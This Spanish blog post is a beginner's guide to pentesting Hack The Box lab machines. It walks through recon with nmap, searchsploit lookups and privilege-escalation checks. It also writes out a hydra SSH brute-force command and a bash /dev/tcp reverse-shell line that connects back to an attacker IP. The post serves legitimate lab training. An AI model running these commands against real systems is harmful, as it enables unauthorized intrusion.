¡Aprende a Hackear con Hack The Box!

Hack The Box (HTB) es una plataforma popular para aprender hacking y ciberseguridad de manera práctica. Si eres principiante, es importante seguir una metodología para abordar las máquinas de forma organizada. En este artículo, te guiaré paso a paso en el proceso de pentesting en HTB.


1. Configuración Inicial

Antes de empezar, asegúrate de tener:

  • Una cuenta en Hack The Box.
  • Una máquina virtual con Kali Linux u otra distribución de pentesting.
  • La conexión VPN de HTB configurada.
  • Un documento de notas para registrar información relevante.

Conectar a la VPN de HTB

sudo openvpn archivo.ovpn

Este archivo se descarga desde la página de HTB en «Access» > «Download VPN».


2. Reconocimiento (Recon)

El primer paso en un pentesting es recopilar información sobre la máquina.

2.1. Identificar la dirección IP de la máquina

Cada máquina en HTB tiene una IP privada dentro de la VPN (ejemplo: 10.10.10.100).

2.2. Escaneo de Puertos con Nmap

nmap -sC -sV -A -p- 10.10.10.100 -oN nmap_scan.txt

Este comando escanea todos los puertos y enumera servicios activos.

2.3. Análisis de Servicios

Según los resultados, investigamos:

  • Puerto 80 (HTTP): Servidor web. Revisamos en el navegador.
  • Puerto 22 (SSH): Puede permitir acceso remoto.
  • Puerto 445 (SMB): Comparticiones de archivos.

Herramientas adicionales: whatweb, gobuster, enum4linux.


3. Enumeración Específica

3.1. Buscar Exploits Públicos

searchsploit servicio_o_version

O bien, buscar en Exploit-DB.

3.2. Fuerza Bruta (Si Es Necesario)

Si encontramos credenciales por defecto:

hydra -l usuario -P rockyou.txt 10.10.10.100 ssh

4. Explotación (Ganar Acceso)

Dependiendo de la información obtenida, ejecutamos ataques para obtener acceso.

4.1. Obtener una Shell Inversa

En nuestra máquina atacante:

nc -lvnp 4444

En la víctima:

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

Reemplaza 10.10.14.2 con tu IP de atacante (ip a).


5. Escalada de Privilegios (Root)

Una vez dentro, buscamos convertirnos en root.

5.1. Revisar Permisos del Usuario

whoami
id
sudo -l

5.2. Buscar Archivos con Permisos Inseguros

find / -perm -4000 2>/dev/null

5.3. Buscar Vulnerabilidades en el Kernel

uname -a

Podemos buscar exploits en Exploit-DB según la versión del sistema.

5.4. Revisar GTFOBins para Abusar Binarios

Si encontramos comandos ejecutables con sudo, buscamos posibles explotaciones en GTFOBins.


6. Captura de Flags

Cada máquina en HTB tiene dos flags:

  • User Flag: En /home/user/user.txt
  • Root Flag: En /root/root.txt

Para leerlas:

cat /home/user/user.txt
cat /root/root.txt

🚨 Importante: No compartas las flags en público.


7. Documentación y Write-up

Es clave registrar los pasos seguidos en cada máquina para mejorar el aprendizaje. Si la máquina ya está retirada, puedes hacer un write-up para tu blog o GitHub (sin las flags).


Resumen de la Metodología HTB

  1. Configurar: Conectar a la VPN y preparar el entorno.
  2. Reconocimiento: Escanear con nmap y herramientas de enumeración.
  3. Enumeración Específica: Buscar exploits y posibles vulnerabilidades.
  4. Explotación: Obtener acceso a la máquina objetivo.
  5. Escalada de Privilegios: Obtener acceso root.
  6. Capturar Flags: User y root.
  7. Documentar: Guardar pasos para futuros aprendizajes.

Consejos Finales

  • Empieza con máquinas fáciles y ve aumentando la dificultad.
  • Practica con diferentes herramientas como Metasploit, Burp Suite y LinPEAS.
  • No te rindas, prueba diferentes enfoques.
  • Siempre respeta la ética hacking (White Hat).

Recuerda: La paciencia y la práctica son claves en el mundo de la ciberseguridad.


Publicado

en

por

Comentarios

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *